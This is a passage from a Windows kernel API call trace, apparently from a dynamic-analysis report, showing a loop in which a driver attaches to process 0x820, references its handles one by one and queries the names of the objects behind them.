| out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.089] ObfDereferenceObject (Object=0xffffe00069db8410) returned 0x7fff [0290.089] IoCompleteRequest () returned 0x0 [0290.089] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.089] PsAcquireProcessExitSynchronization () returned 0x0 [0290.089] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.089] ObReferenceObjectByHandle (in: Handle=0x3d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a93ba0, HandleInformation=0x0) returned 0x0 [0290.089] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.089] PsReleaseProcessExitSynchronization () returned 0x2 [0290.089] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e701 [0290.089] ObQueryNameString (in: Object=0xffffe00069a93ba0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.089] ObfDereferenceObject (Object=0xffffe00069a93ba0) returned 0x7fbc [0290.089] IoCompleteRequest () returned 0x0 [0290.089] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.089] PsAcquireProcessExitSynchronization () returned 0x0 [0290.089] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.089] ObReferenceObjectByHandle (in: Handle=0x3f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069aeacc0, HandleInformation=0x0) returned 0x0 [0290.089] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.089] PsReleaseProcessExitSynchronization () returned 0x2 [0290.089] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e700 [0290.089] ObQueryNameString (in: Object=0xffffe00069aeacc0, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.089] ObfDereferenceObject (Object=0xffffe00069aeacc0) returned 0x800e [0290.089] IoCompleteRequest () returned 0x0 [0290.089] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.089] PsAcquireProcessExitSynchronization () returned 0x0 [0290.089] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.089] ObReferenceObjectByHandle (in: Handle=0x43c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069dbff20, HandleInformation=0x0) returned 0x0 [0290.089] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.089] PsReleaseProcessExitSynchronization () returned 0x2 [0290.089] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ff [0290.089] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.089] ObfDereferenceObject (Object=0xffffe00069dbff20) returned 0x800b [0290.089] IoCompleteRequest () returned 0x0 [0290.089] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.089] PsAcquireProcessExitSynchronization () returned 0x0 [0290.089] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.090] ObReferenceObjectByHandle (in: Handle=0x478, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f08db0, HandleInformation=0x0) returned 0x0 [0290.090] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.090] PsReleaseProcessExitSynchronization () returned 0x2 [0290.090] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6fe [0290.090] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.090] ObfDereferenceObject (Object=0xffffe00069f08db0) returned 0x7fff [0290.090] IoCompleteRequest () returned 0x0 [0290.090] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.090] PsAcquireProcessExitSynchronization () returned 0x0 [0290.090] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.090] ObReferenceObjectByHandle (in: Handle=0x50c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000731c9d20, HandleInformation=0x0) returned 0x0 [0290.090] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.090] PsReleaseProcessExitSynchronization () returned 0x2 [0290.090] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6fd [0290.090] ObQueryNameString (in: Object=0xffffe000731c9d20, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.090] ObfDereferenceObject (Object=0xffffe000731c9d20) returned 0x7ffe [0290.090] IoCompleteRequest () returned 0x0 [0290.090] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.090] PsAcquireProcessExitSynchronization () returned 0x0 [0290.090] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.090] ObReferenceObjectByHandle (in: Handle=0x514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f6d090, HandleInformation=0x0) returned 0x0 [0290.090] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.090] PsReleaseProcessExitSynchronization () returned 0x2 [0290.090] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6fc [0290.090] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.090] ObfDereferenceObject (Object=0xffffe00069f6d090) returned 0x7fff [0290.090] IoCompleteRequest () returned 0x0 [0290.090] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.090] PsAcquireProcessExitSynchronization () returned 0x0 [0290.090] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.090] ObReferenceObjectByHandle (in: Handle=0x5f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a53780, HandleInformation=0x0) returned 0x0 [0290.090] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.090] PsReleaseProcessExitSynchronization () returned 0x2 [0290.090] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6fb [0290.090] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.090] ObfDereferenceObject (Object=0xffffe00068a53780) returned 0x7fdd [0290.090] IoCompleteRequest () returned 0x0 [0290.090] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.090] PsAcquireProcessExitSynchronization () returned 0x0 [0290.090] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.091] ObReferenceObjectByHandle (in: Handle=0x6dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f79380, HandleInformation=0x0) returned 0x0 [0290.091] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.091] PsReleaseProcessExitSynchronization () returned 0x2 [0290.091] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6fa [0290.091] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.091] ObfDereferenceObject (Object=0xffffe00069f79380) returned 0x7fff [0290.091] IoCompleteRequest () returned 0x0 [0290.091] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.091] PsAcquireProcessExitSynchronization () returned 0x0 [0290.091] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.091] ObReferenceObjectByHandle (in: Handle=0x6ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f7c210, HandleInformation=0x0) returned 0x0 [0290.091] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.091] PsReleaseProcessExitSynchronization () returned 0x2 [0290.091] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f9 [0290.091] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.091] ObfDereferenceObject (Object=0xffffe00069f7c210) returned 0x7fff [0290.091] IoCompleteRequest () returned 0x0 [0290.091] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.091] PsAcquireProcessExitSynchronization () returned 0x0 [0290.091] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.091] ObReferenceObjectByHandle (in: Handle=0x6f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f7d650, HandleInformation=0x0) returned 0x0 [0290.091] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.091] PsReleaseProcessExitSynchronization () returned 0x2 [0290.091] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f8 [0290.091] ObQueryNameString (in: Object=0xffffe00069f7d650, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.091] ObfDereferenceObject (Object=0xffffe00069f7d650) returned 0x7ffe [0290.091] IoCompleteRequest () returned 0x0 [0290.091] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.091] PsAcquireProcessExitSynchronization () returned 0x0 [0290.091] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.091] ObReferenceObjectByHandle (in: Handle=0x6f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f80db0, HandleInformation=0x0) returned 0x0 [0290.091] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.091] PsReleaseProcessExitSynchronization () returned 0x2 [0290.091] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f7 [0290.091] ObQueryNameString (in: Object=0xffffe00069f80db0, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.091] ObfDereferenceObject (Object=0xffffe00069f80db0) returned 0x7fc1 [0290.091] IoCompleteRequest () returned 0x0 [0290.091] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.091] PsAcquireProcessExitSynchronization () returned 0x0 [0290.091] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.091] ObReferenceObjectByHandle (in: Handle=0x734, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f7ab80, HandleInformation=0x0) returned 0x0 [0290.091] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.091] PsReleaseProcessExitSynchronization () returned 0x2 [0290.092] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f6 [0290.092] ObQueryNameString (in: Object=0xffffe00069f7ab80, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.092] ObfDereferenceObject (Object=0xffffe00069f7ab80) returned 0x7ffe [0290.092] IoCompleteRequest () returned 0x0 [0290.092] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.092] PsAcquireProcessExitSynchronization () returned 0x0 [0290.092] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.092] ObReferenceObjectByHandle (in: Handle=0x748, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f80f20, HandleInformation=0x0) returned 0x0 [0290.092] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.092] PsReleaseProcessExitSynchronization () returned 0x2 [0290.092] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f5 [0290.092] ObQueryNameString (in: Object=0xffffe00069f80f20, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.092] ObfDereferenceObject (Object=0xffffe00069f80f20) returned 0x7ffd [0290.092] IoCompleteRequest () returned 0x0 [0290.092] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.092] PsAcquireProcessExitSynchronization () returned 0x0 [0290.092] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.092] ObReferenceObjectByHandle (in: Handle=0x754, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2a8db0, HandleInformation=0x0) returned 0x0 [0290.092] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.092] PsReleaseProcessExitSynchronization () returned 0x2 [0290.092] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f4 [0290.092] ObQueryNameString (in: Object=0xffffe0006a2a8db0, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.092] ObfDereferenceObject (Object=0xffffe0006a2a8db0) returned 0x7ffe [0290.092] IoCompleteRequest () returned 0x0 [0290.092] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.092] PsAcquireProcessExitSynchronization () returned 0x0 [0290.092] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.092] ObReferenceObjectByHandle (in: Handle=0x75c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2a8f20, HandleInformation=0x0) returned 0x0 [0290.092] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.092] PsReleaseProcessExitSynchronization () returned 0x2 [0290.092] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f3 [0290.092] ObQueryNameString (in: Object=0xffffe0006a2a8f20, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.092] ObfDereferenceObject (Object=0xffffe0006a2a8f20) returned 0x7ffe [0290.092] IoCompleteRequest () returned 0x0 [0290.092] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.092] PsAcquireProcessExitSynchronization () returned 0x0 [0290.092] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.092] ObReferenceObjectByHandle (in: Handle=0x7b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000727c3bc0, HandleInformation=0x0) returned 0x0 [0290.092] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.092] PsReleaseProcessExitSynchronization () returned 0x2 [0290.092] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f2 [0290.092] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.092] ObfDereferenceObject (Object=0xffffe000727c3bc0) returned 0x7fff [0290.092] IoCompleteRequest () returned 0x0 [0290.093] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.093] PsAcquireProcessExitSynchronization () returned 0x0 [0290.093] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.093] ObReferenceObjectByHandle (in: Handle=0x824, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f86630, HandleInformation=0x0) returned 0x0 [0290.093] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.093] PsReleaseProcessExitSynchronization () returned 0x2 [0290.093] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f1 [0290.093] ObQueryNameString (in: Object=0xffffe00069f86630, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.093] ObfDereferenceObject (Object=0xffffe00069f86630) returned 0x7ffe [0290.093] IoCompleteRequest () returned 0x0 [0290.093] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.093] PsAcquireProcessExitSynchronization () returned 0x0 [0290.093] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.093] ObReferenceObjectByHandle (in: Handle=0x8f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f92680, HandleInformation=0x0) returned 0x0 [0290.093] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.093] PsReleaseProcessExitSynchronization () returned 0x2 [0290.093] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6f0 [0290.093] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.093] ObfDereferenceObject (Object=0xffffe00069f92680) returned 0x7fff [0290.093] IoCompleteRequest () returned 0x0 [0290.093] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.093] PsAcquireProcessExitSynchronization () returned 0x0 [0290.093] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.093] ObReferenceObjectByHandle (in: Handle=0x990, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f95790, HandleInformation=0x0) returned 0x0 [0290.093] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.093] PsReleaseProcessExitSynchronization () returned 0x2 [0290.093] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ef [0290.093] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.093] ObfDereferenceObject (Object=0xffffe00069f95790) returned 0x7fff [0290.093] IoCompleteRequest () returned 0x0 [0290.093] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.093] PsAcquireProcessExitSynchronization () returned 0x0 [0290.093] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.093] ObReferenceObjectByHandle (in: Handle=0x9b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f62cd0, HandleInformation=0x0) returned 0x0 [0290.093] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.093] PsReleaseProcessExitSynchronization () returned 0x2 [0290.093] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ee [0290.093] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.093] ObfDereferenceObject (Object=0xffffe00069f62cd0) returned 0x800c [0290.093] IoCompleteRequest () returned 0x0 [0290.093] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.093] PsAcquireProcessExitSynchronization () returned 0x0 [0290.093] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.094] ObReferenceObjectByHandle (in: Handle=0xa18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fc0590, HandleInformation=0x0) returned 0x0 [0290.094] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.094] PsReleaseProcessExitSynchronization () returned 0x2 [0290.094] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ed [0290.094] ObQueryNameString (in: Object=0xffffe00069fc0590, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.094] ObfDereferenceObject (Object=0xffffe00069fc0590) returned 0x7d94 [0290.094] IoCompleteRequest () returned 0x0 [0290.094] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.094] PsAcquireProcessExitSynchronization () returned 0x0 [0290.094] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.094] ObReferenceObjectByHandle (in: Handle=0xaa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069205780, HandleInformation=0x0) returned 0x0 [0290.094] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.094] PsReleaseProcessExitSynchronization () returned 0x2 [0290.094] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ec [0290.094] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.094] ObfDereferenceObject (Object=0xffffe00069205780) returned 0xffea [0290.094] IoCompleteRequest () returned 0x0 [0290.094] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.094] PsAcquireProcessExitSynchronization () returned 0x0 [0290.094] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.094] ObReferenceObjectByHandle (in: Handle=0xaac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069205780, HandleInformation=0x0) returned 0x0 [0290.094] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.094] PsReleaseProcessExitSynchronization () returned 0x2 [0290.094] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6eb [0290.094] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.094] ObfDereferenceObject (Object=0xffffe00069205780) returned 0xffe9 [0290.094] IoCompleteRequest () returned 0x0 [0290.095] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: 